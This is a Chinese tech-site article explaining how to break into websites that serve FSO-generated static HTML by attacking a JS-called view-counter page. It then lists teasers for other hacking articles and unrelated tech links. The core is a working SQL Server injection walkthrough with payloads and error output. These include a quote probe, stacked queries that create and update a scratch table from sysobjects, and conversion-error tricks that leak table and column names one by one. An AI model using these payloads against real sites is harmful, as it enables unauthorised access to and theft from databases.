全站文章系统采用fso静态生成的html来显示的网站如何入侵?
大家在是否碰到过这样的站点:
全站文章系统采用FSO静态生成的HTML文件来显示。这样做的好处一来可以减轻服务器负担,提高访问速度。二来也阻止了SQL注入式的攻击。。
我来说说他们的文章系统原理:全部文章均在数据库存有一个副本。另处根据模板生成一个HTML页面。
攻击方法:
查看源文件/看里面是否有通过JS来调用的页面。
如调用
来更新文章的浏览次数。
我们就可以这样来试一下可否注入:
http://服务器域名/count.asp?id=1552’
看一下是否出错。如出错说明有注入漏洞。然后正常攻击。
在本机建立一下post.htm的文件和log.txt的文本文件(用来记录用,这是一个好习惯)
post.htm内容:主要是方便输入。
对于SQLSERVER的服务器可以这样判断:在1552后加一分号,如正常有可能是SQLSERVER
对于这类数据库可以先建一个表id=1552;create table aaa(aaa char(20));--
然后插入一条记录:id=1552;insert into aaa values(’test’);--
再之后枚举出他的数据表名:
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0);--
这是将第一个表名更新到aaa的字段处。
id=1552 and exists(select * from aaa where aaa>5)就会报错,多数情况会将表名直接读出:看:
Microsoft OLE DB Provider for SQL Server 错误 ’80040e07’
将 varchar 值 ’vote’ 转换为数据类型为 int 的列时发生语法错误。
/search.asp,行21
其中vote就是表名:
也可以先猜出一个表名,再把(select top 1 name from sysobjects where xtype=’u’ and status>0)的值更新到那个表的一条记录中去。通过网页显示。
读出第一个表,第二个表可以这样读出来(在条件后加上 and name<>’刚才得到的表名’)。
id=1552;update aaa set aaa=(select top 1 name from sysobjects where xtype=’u’ and status>0 and name<>’vote’);--
然后id=1552 and exists(select * from aaa where aaa>5)
读出第二个表,^^^^^^一个个的读出,直到没有为止。
读字段是这样:
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),1));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名
id=1552;update aaa set aaa=(select top 1 col_name(object_id(’表名’),2));--
然后id=1552 and exists(select * from aaa where aaa>5)出错,得到字段名
……类推
php网站注入的测试过程,为你讲解如何拿到php网站的webshell
下面我们来看一下php注入的过程。因为是网络上的主机,这里仅作注入测试,不作进一步的具体操作。我们首先在网站后面加个单引号字符,返回错误信息,证明该网站有可能存在注入。再提交 and 1=1 正常显示,提交
详情2018-02-03 08:50:13责编:llp 来源:驱动管家什么是粘滞键漏洞?怎么利用粘滞键漏洞破解vista密码?
安装XP Vista双系统的用户越来越多,不过总有些马大哈们会忘记Vista账户密码。由于Vista采用比XP更为严格的登录认证,如果遗忘登录密码,我们是很难进入系统的。不过,微软在登录界面有一个粘滞键漏洞,可以用它
详情2018-02-03 20:38:57责编:llp 来源:驱动管家入侵检测系统有什么漏洞?黑客用了什么入侵手法?
本文针对入侵检测系统的漏洞来了解一下黑客的入侵手法。一旦安装了网络入侵检测系统,网络入侵检测系统就会为你分析出网上出现的黑客攻击事件,而且你能用此入侵检测系统的反击功能,即时将这种联机猎杀或阻断。
详情2018-01-26 14:51:28责编:llp 来源:驱动管家精灵宝可梦go存在哪些风险?精灵宝可梦go的权限问题
《Pokémon Go》是任天堂Pokémon(中译名口袋妖怪、宠物小精灵、精灵宝可梦)系列的最新游戏,由 Niantic Labs 联合开发,也是第一款 Pokémon 手游。不需多说,看到这篇文章的你,多半
详情2018-01-16 14:25:16责编:llp 来源:驱动管家系统的密码破解有哪些方法?如何破解系统密码?
一、ERD2003利用ERD2003强行修改系统管理员密码的方法简单、易于操作,且对2000 xp 2003系统均有效。下面就具体介绍一下这个软件的用法。1 下载ERD2003的iso,刻录成可启动的CD,注意别搞错了,直接刻录镜像最好
详情2018-01-15 08:59:12责编:llp 来源:驱动管家php网站系统入侵的过程 php网站常见漏洞出现的原因
听承诺说CASI出2 0了,而且承诺也给了一个有漏洞的地址,正好没事就测试了一下,最近非常郁闷,学不下去,正好今天承诺勾起了我学习php的美好时光,看看自己还能不能搞这样的站吧 过程:承诺给的地址是http:
详情2018-01-26 11:28:53责编:llp 来源:驱动管家pdf文件阅读器Adobe Acrobat Reader存在什么漏洞?
受影响系统:Adobe Acrobat Reader
详情2018-01-22 09:57:56责编:llp 来源:驱动管家微软浏览器接口有漏洞?ie7浏览器的漏洞说明
漏洞警告:通过对微软浏览器IE6跨域漏洞的深入研究,我们发现实际上即使在安装了IE7浏览器的操作系统中,也一样存在类似的问题。这个漏洞并不单独存在于IE6中,而是存在于微软提供的浏览器接口中。在微软提供的浏
详情2018-01-14 15:01:43责编:llp 来源:驱动管家畅无线应用破解中国移动wifi,提供免费无线上网服务
近日,一款名为“畅无线”的应用蹿红网络,原因在于,它利用中国移动的WiFi管理漏洞,为使用者提供免费的无线上网服务。该应用的开发商为上海云联计算机系统有限公司(以下简称云联),公司相关负责人向 记者表
详情2018-01-25 15:29:50责编:llp 来源:驱动管家海康威视远程监控存在的xxe漏洞分析研究报告
海康威视是一个致力于不断提升视频处理技术和视频分析技术,面向全球提供领先的监控产品、技术解决方案与专业优质服务,物联网发展和安全威胁总是如影随形。两个月前,我想研究一下网络摄像机,然后就在亚马逊上
详情2018-01-15 15:26:02责编:llp 来源:驱动管家
- qq农场账号被封了怎么办?qq农场账号被封怎么解封?
- adsl宽带速度慢怎么提速?adsl宽带提速的方法是什么?
- 尼康摄像机的配置怎么样?尼康摄像机的介绍
- 摄像机标定是什么?摄像机标定的原理介绍
- 局域网打印机共享设置教程:win10和win7系统怎么设置共享打印机
- route命令怎么操作?linux系统的route命令操作放假结束
- 网卡故障会造成局域网网络连接不上吗?要怎么解决
- 三星s6摔了会不会很容易碎?三星s6的抗摔测试
- 主打拍照功能的智能手机:galaxy s4 zoom如何安装sim卡?
- 笔记本cpu温度在哪儿看?笔记本cpu温度标准是多少?
- 入侵渗透的相关步骤 网络扫描有哪些工具?
- 驱动器是什么?为什么回收站显示的驱动器容量和实际有差
- 怎么把pages文件转换成PDF文件?pages文件是怎么保存为PDF文件的?
- 二维码识别软件怎么下载手机软件?二维码识别软件好用吗?
- 长焦镜头拍摄的特点是什么?长焦镜头的介绍
- 无线摄像机好不好用?无线摄像机有哪些优点
- 苹果电脑系统怎么修改dns?dns设置的方法
- win7系统下代理服务器的设置方法步骤详解
- 28328分!步步高vivo x5跑分的成绩怎么样?
- vivo y66截图有这几种方法?vivo y66截图照片在哪里看?